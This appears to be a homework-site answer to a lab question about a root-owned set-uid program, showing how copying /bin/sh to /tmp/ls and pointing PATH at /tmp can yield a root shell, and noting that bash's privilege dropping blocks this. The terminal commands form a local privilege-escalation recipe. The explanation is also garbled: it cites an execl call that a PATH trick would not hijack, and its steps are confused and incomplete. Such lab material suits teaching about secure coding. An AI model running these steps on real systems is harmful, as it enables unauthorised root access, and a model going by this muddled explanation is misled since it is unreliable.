Answer:
Answer explained below
Explanation:
Yes, you can let Set-uid program that is owned by root to run your code instead of /bin/ls but it has it's own drawbacks and is actually not safe.
As you can not rely on that since some of the shells if different from the ruid drop an euid which is actually not safe.
execl("/bin/ls", "ls",(char *)0);
run this under your main program.
Since it can have a root previlege,
-$ cd /tmp/
/tmp$ sudo su
:/tmp# gcc -o system system.c
:/tmp# chmod u+s system // changing file permissions
:/tmp# exit
exit
:/tmp$ cp /bin/sh /tmp/ls
:/tmp$ ./system
<u>Steps:
</u>
1. The first thing you need to do is copy /bin/sh to /tmp.
2. After copying /bin/sh to /tmp set a new name ls but make sure your sh ->.zsh.
3. Set PATH to current directory. /tmp.
4. Compile
5. Run the program system and you can get your root previledge.
Now, with the above exmaple if you change /bin/sh soo that it points back to /bin/bash and repeat all the previous steps, you will not be able to get your root previledges.
